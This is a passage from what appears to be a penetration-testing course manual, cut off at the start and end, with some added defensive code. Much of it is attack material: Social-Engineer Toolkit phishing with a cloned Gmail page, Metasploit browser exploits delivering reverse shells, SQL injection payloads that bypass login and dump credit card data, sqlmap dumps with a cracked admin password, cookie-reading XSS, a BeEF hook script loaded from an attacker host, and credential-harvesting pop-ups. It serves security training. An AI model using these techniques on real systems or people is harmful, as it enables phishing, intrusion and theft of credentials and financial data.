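guest:x:1002:1002::/home/guest:/bin/bash
olduser:x:1003:1003::/home/olduser:/bin/bash
svc:x:1004:1004::/var/lib/svc:/usr/sbin/nologin
"""

SAMPLE_SHADOW = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASHroot:17100:0:99999:7:::
daemon:*:17100:0:99999:7:::
test:$6$PLACEHOLDERSALT$PLACEHOLDERHASHtest:17100:0:99999:7:::
new:$6$PLACEHOLDERSALT$PLACEHOLDERHASHnew:17100:0:99999:7:::
guest::17100:0:99999:7:::
olduser:!$6$PLACEHOLDERSALT$PLACEHOLDERHASHold:17100:0:99999:7:::
"""


def unshadow_merge(passwd_text, shadow_text):
    """Merge passwd and shadow lines the way unshadow(8) does.

    Field 2 of each passwd line ("x") is replaced by field 2 of the shadow line
    for the same user; users with no shadow line keep their passwd field.
    """
    shadow_hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            shadow_hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        fields[1] = shadow_hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit_entries(merged_lines):
    """Classify each merged entry by what its password field actually means.

    Returns {user: status} where status is one of:
      "empty"   - no password set at all (a login prompt may accept an empty one)
      "locked"  - field starts with ! or *, so password login is disabled
      "hashed"  - a real hash is present: this is what a cracker would work on
      "no-hash" - passwd still says "x" because shadow had no entry for the user
    """
    result = {}
    for line in merged_lines:
        user, secret = line.split(":")[:2]
        if secret == "":
            result[user] = "empty"
        elif secret[0] in "!*":
            result[user] = "locked"
        elif secret == "x":
            result[user] = "no-hash"
        else:
            result[user] = "hashed"
    return result


def crackable_users(merged_lines):
    """Users whose entries a cracker could actually attack, sorted for output."""
    return sorted(u for u, s in audit_entries(merged_lines).items() if s == "hashed")


if __name__ == "__main__":
    merged = unshadow_merge(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for user, status in audit_entries(merged).items():
        print(f"{user:8s} {status}")
    print("worth feeding to john:", crackable_users(merged))
```

The "empty" and "no-hash" cases are the ones worth acting on first: an empty field on an account with a login shell is a weaker position than any password that a wordlist might or might not contain, and a passwd entry without a shadow counterpart is a sign that the two files have drifted apart.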


Module 9: More Exploitation


Social Engineering Toolkit

Type setoolkit in a terminal and select Social-Engineering Attacks.

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

Spear Phishing Attacks

The spear-phishing attack is used for targeted email attacks against a victim. You can send multiple emails based on results from the email harvester, or you can send them to individuals. You can also utilize a file-format bug (for example a PDF bug) and send the malicious file to the victim.

set> 1

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu


Website Attack Vector

The web attack vector is used to conduct phishing attacks.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to
compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based
payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits
through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username
and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page
to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method
utilizes iframe replacements to make the highlighted URL link to appear legitimate however
when clicked a window pops up then is replaced with the malicious link. You can edit the link
replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For
example you can utilize the Java Applet, Metasploit Browser, Credential
Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection
through HTA files which can be used for Windows-based powershell exploitation through the
browser.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu



Java Applet Attack Method


The Java Applet attack will create a malicious Java Applet that once run will completely
compromise the victim. SET clones a website and once the victim has clicked run, it will
redirect the victim back to the original site. This attack vector affects Windows, Linux, and OSX
and can compromise them all. You can select web templates which are pre-defined websites, or
you can import your own website. In this example we will be using the site cloner which will clone
a website for us. Let’s launch SET and prep our attack.

set:webattack>1

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone. The third method allows you to import your own website; note that you should only have an index.html when using the import website functionality.
As soon as the victim clicks Run on the Java applet popup, you will get a reverse connection.

Metasploit Browser Exploit Method


The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability to clone the website and utilize browser-based exploits. Let's take a quick look at launching a browser exploit through SET.

set:webattack>2

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

We will use Site Cloner:

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:192.168.3.103
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://gmail.com

Enter the browser exploit you would like to use [8]:


1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)

We now have a list of exploits that we can use; any of them can be chosen, and here we select 1. After that, select a payload.

set:payloads>1

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to
attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send
back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to
attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64),
Meterpreter

set:payloads>1
set:payloads> Port to use for the reverse [443]:443

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use exploit/multi/browser/adobe_flash_hacking_team_uaf
resource (/root/.set//meta_config)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.3.103
LHOST => 192.168.3.103
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set//meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job.


[*] Started reverse TCP handler on 192.168.3.103:443
msf exploit(adobe_flash_hacking_team_uaf) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.3.103:8080/

When the target browses to http://192.168.3.103:8080, you will get the reverse shell if the target is exploitable, and the incoming requests will be visible in the console.

Credential Harvester Attack Method


The credential harvester attack method is used when you don’t want to specifically get a shell
but perform phishing attacks in order to obtain username and passwords from the system.
Tabnabbing Attack Method
The tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks
the link, the victim will be presented with a “Please wait while the page loads”. When the victim
switches tabs because he/she is multi-tasking, the website detects that a different tab is present
and rewrites the webpage to a website you specify. The victim clicks back on the tab after a
period of time and thinks they were signed out of their email program or their business
application and types the credentials in. When the credentials are inserted, they are harvested
and the user is redirected back to the original website.
Web Jacking Attack Method

The web jacking attack method will create a website clone and present the victim with a link
stating that the website has moved. When you hover over the link, the URL will be presented
with the real URL, not the attacker’s machine. So for example if you are cloning gmail.com, the
url when hovered over it would be gmail.com. When the user clicks the moved link, gmail
opens and then is quickly replaced with your malicious webserver.
Multi Attack Web Vector
The multi-attack web vector will allow you to specify multiple web attack methods in order to
perform a single attack. In some scenarios, the Java Applet may fail however an internet
explorer exploit would be successful. Or maybe the Java Applet and the Internet Explorer
exploit fail and the credential harvester is successful. The multi-attack vector allows you to turn
on and off different vectors and combine the attacks all into one specific webpage. So when the
user clicks the link he will be targeted by each of the attack vectors you specify.
Infectious Media Generator


Infectious Media Generator creates a Metasploit-based payload, sets up a listener for you and generates a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if AutoRun is enabled, the code will automatically execute and take control of the machine.

Browser autopwn
Browser Autopwn performs browser fingerprinting prior to launching exploits at the victim.
Therefore, if the remote PC is using Internet Explorer 6, it will not launch IE7 exploits at it.

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.3.103
SRVHOST => 192.168.3.103
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.3.103...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.3.103:8080/wmZv
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.3.103:8080/ZXUnDgsDrzMA

It will start multiple listeners for multiple exploits. When the target browses to http://192.168.3.103:8080, we will see the request:

[*] --- Done, found 20 exploit modules

[*] Using URL: http://192.168.3.103:8080/
[*] Server started.
[*] Handling '/'


[*] Handling
'/?sessid=V2luZG93czp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZW
Q6ZW4tVVM6eDg2OkNocm9tZTo1NC4wLjI4NDAuOTk6'
[*] JavaScript Report: Windows:undefined:undefined:undefined:undefined:en-
US:x86:Chrome:54.0.2840.99:
[*] Reporting: {"os.product"=>"Windows", "os.language"=>"en-US", "os.arch"=>"x86",
"os.certainty"=>"0.7"}
[*] Responding with 6 exploits
[*] Handling '/'
[*] Handling
'/?sessid=V2luZG93czp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZW
Q6ZW4tVVM6eDg2OkNocm9tZTo1NC4wLjI4NDAuOTk6'
[*] JavaScript Report: Windows:undefined:undefined:undefined:undefined:en-
US:x86:Chrome:54.0.2840.99:
[*] Reporting: {"os.product"=>"Windows", "os.language"=>"en-US", "os.arch"=>"x86",
"os.certainty"=>"0.7"}
[*] Responding with 6 exploits

As soon as victim visits our URL we’ll get a session if browser is vulnerable.
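To recognise this callback on the defensive side, here is an added example (not from the manual or from Metasploit) that decodes the sessid value from logged requests. The log line format is constructed, and the field positions are inferred from the output above (position 0 matches os.product, 5 os.language, 6 os.arch, then the browser name and version), so the remaining positions are left unnamed.

```python
import base64
from urllib.parse import urlparse, parse_qs

# Field positions inferred from the module output above; an assumption, not documented.
FIELD_NAMES = {0: "os.product", 5: "os.language", 6: "os.arch",
               7: "browser", 8: "browser.version"}

# The sessid from the output above, plus constructed log lines in the shape
# '<client-ip> "<method> <path> HTTP/1.1" <status>'.
SESSID = ("V2luZG93czp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6"
          "ZW4tVVM6eDg2OkNocm9tZTo1NC4wLjI4NDAuOTk6")
SAMPLE_LOG = [
    '10.0.0.5 "GET / HTTP/1.1" 200',
    f'10.0.0.5 "GET /?sessid={SESSID} HTTP/1.1" 200',
    '10.0.0.9 "GET /index.php?sessid=amd6v7n5cp0mjjacnvati1mae0 HTTP/1.1" 200',
    'garbage line without a request',
]


def decode_sessid(sessid: str) -> dict:
    """Decode the base64 fingerprint the autopwn client script sends back as 'sessid'.

    Returns the named fields, or an empty dict when the value is not a colon-separated
    fingerprint, so ordinary session identifiers are not flagged.
    """
    try:
        value = sessid.replace(" ", "+")          # parse_qs turns '+' into a space
        padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
        raw = base64.b64decode(padded, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return {}
    parts = raw.split(":")
    if len(parts) < 9:
        return {}
    return {name: parts[i] for i, name in FIELD_NAMES.items()}


def find_fingerprint_callbacks(log_lines):
    """Return (client_ip, fingerprint) for every logged request carrying a decodable
    fingerprint; such a request is the client-side half of the exchange shown above."""
    hits = []
    for line in log_lines:
        try:
            path = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue
        query = parse_qs(urlparse(path).query)
        for value in query.get("sessid", []):
            fingerprint = decode_sessid(value)
            if fingerprint:
                hits.append((line.split(" ")[0], fingerprint))
    return hits
```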

Module 10: Web Application Hacking

Information Gathering

Directory Fuzzing/URL Mapping:

DirBuster is a tool for directory brute forcing. It uses wordlists to guess directory and file names. Use the
following command in a terminal:

root@kali:~# dirbuster

1. Enter the target URL: http://192.168.2.5 or http://targetwebsite.com
2. Click Browse and select a wordlist. Lists are located in /usr/share/wordlists/dirbuster
3. Click Start
4. After some time the scan will be complete

Introduction to Burp Suite

Burp Suite is a very powerful tool used for web application security penetration testing. It has a
wide range of features that allow us to perform various tasks, launch various attacks etc. It works
as a proxy and intercepts web traffic. It also works with SSL.

You can download Burp Suite from https://portswigger.net/burp/download.html. Start Burp
Suite. You will be presented with an interface.

First, we need to configure Burp Suite to work as a proxy. Go to Proxy -> Options. Check the
127.0.0.1:8080 interface.

Now go to Intercept Server Responses and check Intercept responses based on the following rules.

Burp Suite is now ready to intercept traffic. Now open Firefox or any other browser. Go to
Options -> Advanced -> Network -> Settings.

Now add 127.0.0.1 and port 8080 as the proxy. Remove localhost and 127.0.0.1 from "No proxy for".

All the browsing performed in Firefox will now be captured by Burp Suite.

Now we will start the information gathering phase using Burp Suite. Browse to any website or web
application. We have opened http://192.168.3.100/twa/index.php

Now go to the Target tab, right click on the address and add it to scope.

If you go to the Scope tab you will see that it has been added to scope. Now we want to get information
about the application, such as the directory structure. We will use the Spider tool, which spiders the
host to find links and map the structure of the application.

Spider has started.

We will see the directory structure and pages of the application.

Fingerprinting using Wappalyzer

Wappalyzer is a browser extension which can be used to identify critical information about the
web application and the underlying server. It is a free extension that can be installed on Firefox
or Chrome.
For Chrome
https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en
For Firefox
https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
As soon as we browse to a website, it lists the technologies the site is built on.

This is critical information as we can now look for technology-specific vulnerabilities as well.

SQL Injection

SQL Injection is a common web vulnerability found in dynamic sites that is caused by unsanitized
user input, which is then passed on to a database. This user input can then be manipulated to
"break out" of the original query made by the developers, to include more malicious actions.
These types of vulnerabilities can lead to database information leakage and, depending on the
environment, could also lead to complete server compromise. Before we move on to SQL
injection, let's go through some concepts.

Database:
A database is a repository of the data needed by the web application. It may include
usernames, passwords, IDs and related information. There are various database servers in
use. Some of these are:
- MySQL
- MSSQL
- MS-Access
- Oracle
- PostgreSQL
- SQLite

SQL
Structured Query Language (SQL) is a programming language for getting data in and out of a
database. Various commands are used for managing a database.
A sample SQL query is as follows:

Select * from table_name;

For example:

Select * from users;

The query outputs all the data from the users table, that is, all the rows inside the users table.

Another query is:

Insert into table_name (column_names, ...) values (x, y, z, ...);

For example:

Insert into users (ID, name, dob) values (4, 'Jacob', '1990-02-14');

Injection Points

There are certain input points where we should look for SQL injection, for example login pages,
search pages etc. SQL injection can be done using both GET and POST methods. To check for SQL
injection, a single quote (') or another special character is entered as input. The following is an
example of SQL injection using the GET method.

We inject a ' at the parameter id.

As you can see, we got a database error, which shows that the input is being fed straight into the SQL query
without sanitization.

An example of POST SQL injection is a login form.

Putting a single quote (') in the username field and pressing Login, we get the following error.

The error messages show that SQL injection is possible. Now that we have identified SQL injection
we can launch further attacks.

Authentication Bypass

SQL injection is a code injection technique, used to attack data-driven applications, in which
malicious SQL statements are inserted into an entry field for execution.
Let's examine the login page and the underlying source code:

mysql_select_db('webappdb');
$user = $_POST['user']; // unsanitized
$pass = $_POST['pass']; // unsanitized
$query = "select * from users where name = '$user' and password = '$pass' ";
$queryN = mysql_query($query) or die(mysql_error());
if (mysql_num_rows($queryN) == 1)
{
    $resultN = mysql_fetch_assoc($queryN);
    $_SESSION['user'] = $_POST['user'];
    header("location:admin.php");
}
else // user rejected
{
    echo "<br /><h1>Wrong Username or Password</h1>";
    echo '<META HTTP-EQUIV="Refresh" CONTENT="2;URL=admin.php">';
}

Notice how the $user and $pass POST variables are not sanitized in any way, and are then used
as part of a SQL statement.
We have a web application running which requires a username and password for authentication.
The web application is at http://192.168.2.6.

Click on Login/Register to reach the web form. Now we will try to bypass authentication using SQL injection.

We enter HI' or 1=1 -- (with a trailing space) as the username and leave the password field empty. When we press Login,

we are logged in as admin. The reason it logged us in as admin is that admin was
the first account entry in the database. The underlying query would look like this:

select * from users where name = 'HI' or 1=1 -- ' and password = ''

-- starts a comment in SQL, so the password part of the query is commented out. This is a simple vulnerability
present in many web applications.

Data Extraction

Another example is viewing account details. We can use the same injection string to view all of
the data. Go to Injection Attacks -> SQLi Extract Data -> User Info.

We enter HI' or 1=1 -- in both the username and password fields and click View Account Details.

We get a dump of all the account data.

SQL Injection (Union)

Union-based SQL injection appends a UNION SELECT to the original query. The first step is to find the number
of columns returned by the query. To test this vulnerability go to the User Info page in the web application.

The user enters his/her credentials and the details are shown. We will now try to find the number
of columns in the underlying query. We start with the following input:

' union select null,null -- (make sure to put a space after --)

We get an error saying that the SELECT statements have a different number of columns. We keep adding
nulls until the number of columns is equal to the number of values we have supplied. In this case
we have supplied 7 null values, and the following result is obtained.

Now we replace the nulls with numbers. The input is:

' union select 1,2,3,4,5,6,7 --

Now we can map the output fields to the columns. We can use this vulnerability to extract
information. For example, we can use the input

' union select 1,@@version,3,4,5,6,7 --

to get the DB version.

We can use functions like user() to get the database user name. Various other functions can also be
used.

Let's try another query. There is a table named credit_cards in this application. We will try to get its
data using the same method. We use the following input:

' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards --
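As an added example (not the manual's code), the login and User Info queries from the two exercises above are rebuilt over an in-memory SQLite database constructed here, so the HI' or 1=1 -- bypass and the null-counting union procedure can be seen next to the parameterized queries that stop them. The table contents are made up, and SQLite stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for webappdb: admin is the first row of users, and credit_cards
# has the columns used in the union exercise. Every value is made up.
SCHEMA = """
CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'adminpass'), (2, 'jacob', 's3cret');
CREATE TABLE credit_cards (ccid INTEGER, ccnumber TEXT, ccv TEXT, expiration TEXT);
INSERT INTO credit_cards VALUES (1, '4444111122223333', '123', '2019-12');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, user, password):
    """Same shape as the PHP above: the POST values are spliced into the query text."""
    query = f"select * from users where name = '{user}' and password = '{password}'"
    return conn.execute(query).fetchall()


def login_safe(conn, user, password):
    """Hardened form: placeholders keep the input as data, never as SQL syntax."""
    query = "select * from users where name = ? and password = ?"
    return conn.execute(query, (user, password)).fetchall()


def user_info_vulnerable(conn, user):
    """A seven-column query behind a User Info style page, again built by concatenation."""
    query = ("select id, name, password, null, null, null, null "
             f"from users where name = '{user}'")
    return conn.execute(query).fetchall()


def user_info_safe(conn, user):
    query = "select id, name, password, null, null, null, null from users where name = ?"
    return conn.execute(query, (user,)).fetchall()


def union_column_count(conn, max_cols=20):
    """The manual's null-counting procedure, automated: one more null per attempt until
    the UNION stops failing with a column-count mismatch. Returns the count, or None.
    For a defender, the same pattern in web logs (a run of requests whose parameter
    differs only in the number of 'null' tokens) is a reliable sign of this probing."""
    for n in range(1, max_cols + 1):
        probe = "' union select " + ",".join(["null"] * n) + " -- "
        try:
            user_info_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def demo():
    """Run the exercises above against the toy database and summarise what each returns."""
    conn = open_db()
    bypass = "HI' or 1=1 -- "
    vulnerable_rows = login_vulnerable(conn, bypass, "")
    safe_rows = login_safe(conn, bypass, "")
    dump = user_info_vulnerable(
        conn, "' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards -- ")
    return {
        "bypass_rows_vulnerable": len(vulnerable_rows),  # every user; the first is admin
        "bypass_first_user": vulnerable_rows[0][1],
        "bypass_rows_safe": len(safe_rows),              # 0: the quote is just data
        "columns_found": union_column_count(conn),
        "card_numbers_leaked": [row[1] for row in dump],
    }
```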

We have got all the entries in the table. In short, we are dumping database content.

SQLMap

The whole process of SQL injection can also be automated using a tool. sqlmap is an open
source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over database servers. It comes with a powerful detection engine,
many niche features for the ultimate penetration tester and a broad range of switches ranging
from database fingerprinting, over data fetching from the database, to accessing the underlying
file system and executing commands on the operating system.

Browse to http://192.168.2.7

Click on test. In the URL, you will see that data is being passed using a GET parameter.

Let us change the value of id from 1 to 2.

Let's check if it is vulnerable to SQL injection by inserting ' in id.

This error implies that the parameter may be vulnerable to SQL injection. We will now use
sqlmap to exploit it:

root@kali:~# sqlmap -u "http://192.168.2.7/cat.php?id=2" --dbs

The --dbs parameter lists the databases.

[02:16:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[02:16:35] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] photoblog

[02:16:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.7'

Two databases have been listed. We will try to get the tables of the photoblog database:

root@kali:~# sqlmap -u "http://192.168.2.7/cat.php?id=2" -D photoblog --tables

The --tables parameter lists the tables of the selected database.

[02:18:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[02:18:05] [INFO] fetching tables for database: 'photoblog'
Database: photoblog
[3 tables]
+------------+
| categories |
| pictures   |
| users      |
+------------+

We are interested in the users table. So, the next step is to get all the data of the users table:

root@kali:~# sqlmap -u "http://192.168.2.7/cat.php?id=2" -D photoblog -T users --dump-all

sqlmap will ask whether to crack the password hashes it finds. Select Yes. We get the following result:

Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

We have got the password, and sqlmap has cracked the hash for us as well. Let's try these
credentials on http://192.168.2.7/admin/login.php

Cross Site Scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web
applications. XSS enables attackers to inject client-side script into web pages viewed by other
users. A cross-site scripting vulnerability may be used by attackers to bypass access controls.

Reflected XSS
Reflected XSS occurs when user input is immediately returned by a web application in an error
message, search result, or any other response that includes some or all of the input provided by
the user as part of the request, without that data being made safe to render in the browser, and
without permanently storing the user-provided data. In some cases, the user-provided data may
never even leave the browser.

Stored XSS
Stored XSS generally occurs when user input is stored on the target server, such as in a database,
in a message forum, visitor log, comment field, etc., and a victim is then able to retrieve the stored
data from the web application without that data being made safe to render in the browser.

Reflected XSS

Go to Cross Site Scripting -> Reflected (First Order) -> DNS Lookup and inject the following
string:

<script>alert("XSS");</script>

You can see that the JavaScript code is executed. As another example, if we want to display the
cookie value we can use alert(document.cookie):

<script>alert(document.cookie);</script>

Stored (Persistent) XSS

Go to Cross Site Scripting -> Persistent -> Add to your Blog.

Inject the script in the blog section and press Save Blog Entry.

When we press the button the blog entry is saved in the database. We also get a prompt.

Now navigate to the View Blogs area. As soon as the page loads, the XSS payload is executed. This shows the
presence of stored XSS.

This popup appears each time the page is loaded. This happens because the XSS script is
stored in the database and is executed whenever it is rendered on the page.

iFrame Injection

Now that we have identified XSS, we can inject iFrames to redirect the victim to malicious pages.

When we view all the blogs we see the result.
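As an added example (not the manual's code), here is the DNS Lookup and blog rendering done both ways, echoing input unchanged and with output encoding, together with the response headers that blunt the cookie-reading payload from the reflected exercise. The page fragments, the blog entries and the attacker.invalid frame are constructed.

```python
import html

# Constructed inputs: the two payloads from the DNS Lookup exercise above, a frame like
# the one used in the blog exercise, and a hostname a legitimate user would type.
INPUTS = {
    "benign": "www.example.com",
    "alert": '<script>alert("XSS");</script>',
    "cookie": "<script>alert(document.cookie);</script>",
    "frame": '<iframe src="http://attacker.invalid/"></iframe>',
}


def render_lookup_vulnerable(hostname):
    """Reflected XSS: the looked-up name is echoed into the page unchanged."""
    return f"<p>Results for {hostname}</p>"


def render_lookup_safe(hostname):
    """Output encoding: < > & \" ' become entities, so the browser renders text, not tags."""
    return f"<p>Results for {html.escape(hostname, quote=True)}</p>"


def render_blog_safe(entries):
    """Stored XSS is fixed the same way: entries stay as typed in the database and are
    encoded at the moment they are rendered, so a saved script or frame never becomes
    executable markup on the View Blogs page."""
    return "<ul>" + "".join(f"<li>{html.escape(e)}</li>" for e in entries) + "</ul>"


def contains_active_content(fragment):
    """Check used in the tests: does rendered HTML still carry a script or iframe tag?"""
    lowered = fragment.lower()
    return "<script" in lowered or "<iframe" in lowered


def security_headers():
    """Response headers that limit the damage when encoding is missed somewhere: the CSP
    refuses inline script and any framing source, and HttpOnly keeps the session cookie
    out of document.cookie, which the second payload above reads."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; frame-src 'none'; object-src 'none'",
        "Set-Cookie": "PHPSESSID=<session-id-placeholder>; HttpOnly; Secure; SameSite=Lax",
    }
```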

BeEF

The Browser Exploitation Framework allows a penetration tester to assess the security posture of
a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF
looks past the hardened network perimeter and client system, and examines exploitability within
the context of the one open door: the web browser. BeEF will hook one or more web browsers
and use them as beachheads for launching directed command modules and further attacks
against the system from within the browser context. [6]

If we have found cross site scripting in our target web application, we can use BeEF to further
exploit the target. To start BeEF on Kali Linux type the following command:

root@kali:~# beef-xss

The framework will start. You will get a hook URL.

Copy the UI URL and paste it into the browser.

Username: beef and password: beef

You will be presented with an interface. Copy the sample links that are present on the page. If
you paste one into the browser you will see a similar URL:

Link1: http://some_ip:3000/demos/basic.html
Link2: http://some_ip:3000/demos/butcher/index.html

These are some sample links already created so that you can start your attack. Send these links to
the target. When the target opens the link in the browser you will get a hook. If the web
application is vulnerable to XSS we can craft a script that will execute and hook the browser as
well. An example is:

<script src=http://192.168.3.107:3000/hook.js>alert("Successful");</script>

Execute this script in the vulnerable field to get a hook. As soon as we execute it we will see a
new entry.

With a browser hooked there are various modules that can be used to exploit the end user.

One example of an attack is Pretty Theft under Social Engineering.

When we execute the attack, the victim will see a dialog saying the Facebook session has expired. Remember that
the IP in the custom logo should be the same as your BeEF host. As soon as we execute the attack the dialog box
appears.

When the victim enters their credentials, they are captured. We have got the username and
password.

File Inclusions

Local File Inclusion

Local File Inclusion (also known as LFI) is the process of including files that are already locally
present on the server, by exploiting vulnerable inclusion procedures implemented in
the application. This vulnerability occurs, for example, when a page receives as input the path
to the file that has to be included and this input is not properly sanitized, allowing directory
traversal characters (such as dot-dot-slash) to be injected. Although most examples point to
vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such
as JSP, ASP and others.

We will browse to any page in our vulnerable web application.

As we see in the URL, the page is loaded via a parameter:

http://192.168.2.6/index.php?page=login.php

If we enter a different value we will get a different result. E.g. if we enter dns-lookup.php
we are taken to another page.

Similarly, if a page is not found we will get an error.

We will try to access server-related files and see if they are accessible.

As we can see, we can view the contents of the file. Similarly we can query other files like
/etc/profile.

Remote File Inclusion

A file inclusion vulnerability is a type of vulnerability most often found on websites. It allows an
attacker to include a file, usually through a script on the web server. The vulnerability occurs due
to the use of user-supplied input without proper validation. This can lead to something as
minimal as outputting the contents of the file or more serious events such as:
• Code execution on the web server
• Code execution on the client side, such as JavaScript, which can lead to other attacks such
as cross site scripting (XSS)
• Denial of service (DoS)
• Data theft/manipulation

We will try to include remote files from various websites using the text file viewer feature in our
application.

Capturing the request in Burp Suite:

POST /index.php?page=text-file-viewer.php HTTP/1.1
Host: 192.168.2.6
